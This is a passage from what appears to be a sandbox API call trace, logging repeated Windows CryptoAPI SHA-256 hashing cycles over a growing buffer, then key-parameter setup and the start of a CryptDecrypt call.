(HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86c10 [0186.802] CryptDestroyHash (hHash=0x3396f270) returned 1 [0186.802] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0186.802] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0186.803] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.803] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0186.803] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86e20 [0186.803] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0186.803] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0186.803] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0186.803] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.803] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0186.803] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87210 [0186.803] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.803] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0186.803] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0186.804] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.804] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0186.804] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87240 [0186.804] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0186.804] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0186.804] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.805] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.805] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0186.805] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e872a0 [0186.805] CryptDestroyHash (hHash=0x3396f660) returned 1 [0186.805] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.805] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0186.805] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.805] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0186.805] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87480 [0186.805] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.805] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0186.805] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0186.806] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.806] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0186.806] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86fa0 [0186.806] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.806] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0186.806] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0186.807] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.807] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0186.807] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e872d0 [0186.807] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.807] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0186.807] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.807] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.807] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0186.807] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87570 [0186.807] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.807] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.807] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0186.808] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.808] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0186.808] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87330 [0186.808] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.808] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0186.808] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.809] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.809] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0186.809] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e875d0 [0186.809] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.809] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.809] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0186.809] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.809] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0186.812] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e870c0 [0186.812] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.812] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0186.812] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.812] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.812] CryptHashData (hHash=0x3396f7b0, pbData=0x32348160, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0186.812] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87360 [0186.812] CryptDestroyHash (hHash=0x3396f7b0) returned 1 [0186.812] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.812] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0186.813] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.813] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0186.813] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86c70 [0186.813] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0186.813] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0186.813] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338226d0) returned 1 [0186.814] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.814] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0186.814] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86fd0 [0186.814] CryptDestroyHash (hHash=0x3396f190) returned 1 [0186.814] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0186.814] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0186.814] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.815] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0186.815] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86ca0 [0186.815] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.815] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0186.815] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.815] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.815] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0186.815] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86d30 [0186.815] CryptDestroyHash (hHash=0x3396f190) returned 1 [0186.815] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.815] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0186.816] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.816] CryptHashData (hHash=0x3396f270, pbData=0x32348160, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0186.816] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86d60 [0186.816] CryptDestroyHash (hHash=0x3396f270) returned 1 [0186.816] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0186.816] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0186.817] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.817] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0186.817] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87390 [0186.817] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.817] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0186.817] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0186.817] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.817] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0186.817] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e873f0 [0186.817] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.817] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0186.817] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.818] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.818] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0186.818] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e873c0 [0186.818] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.818] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.818] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0186.818] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.819] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0186.819] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86e50 [0186.819] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.819] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0186.819] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0186.820] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.820] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0186.820] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87000 [0186.820] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.820] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0186.820] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0186.821] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.821] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0186.821] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86cd0 [0186.821] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.821] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0186.821] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821fd0) returned 1 [0186.822] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.822] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0186.822] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87600 [0186.822] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.822] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0186.822] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0186.822] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.822] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0186.822] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e875a0 [0186.822] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.822] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0186.822] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0186.823] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.823] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0186.823] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87420 [0186.823] CryptDestroyHash (hHash=0x3396f190) returned 1 [0186.823] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0186.823] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0186.824] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.824] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0186.824] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87030 [0186.824] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.824] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0186.824] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.824] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.824] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0186.824] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e874b0 [0186.824] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.825] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.825] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0186.825] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.825] CryptHashData (hHash=0x3396f270, pbData=0x32348160, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0186.827] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86af0 [0186.827] CryptDestroyHash (hHash=0x3396f270) returned 1 [0186.827] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0186.828] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338226d0) returned 1 [0186.828] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.828] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0186.828] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87510 [0186.828] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0186.828] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0186.828] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0186.829] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.829] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0186.829] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87630 [0186.829] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.829] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0186.829] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338226d0) returned 1 [0186.830] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.830] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0186.830] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87660 [0186.830] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.830] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0186.830] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0186.830] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.830] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0186.831] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87060 [0186.831] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.831] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0186.831] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.831] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.831] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0186.831] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87090 [0186.831] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.831] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.831] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0186.832] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.832] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0186.832] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e870f0 [0186.832] CryptDestroyHash (hHash=0x3396f190) returned 1 [0186.832] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0186.832] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.833] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.833] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0186.833] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87120 [0186.833] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.833] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.833] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.833] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.833] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0186.833] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87690 [0186.833] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.833] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.834] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.834] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.834] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0186.834] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86ac0 [0186.834] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.834] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.834] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.835] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.835] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0186.835] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86b20 [0186.835] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.835] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.837] CryptSetKeyParam (hKey=0x3396f040, dwParam=0x4, pbData=0xcdfc4*=0x1, dwFlags=0x0) returned 1 [0186.837] CryptSetKeyParam (hKey=0x3396f040, dwParam=0x1, pbData=0x32e87a20, dwFlags=0x0) returned 1 [0186.837] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x280) returned 0x32803c00 [0186.838] CryptDecrypt (in: hKey=0x3396f040, 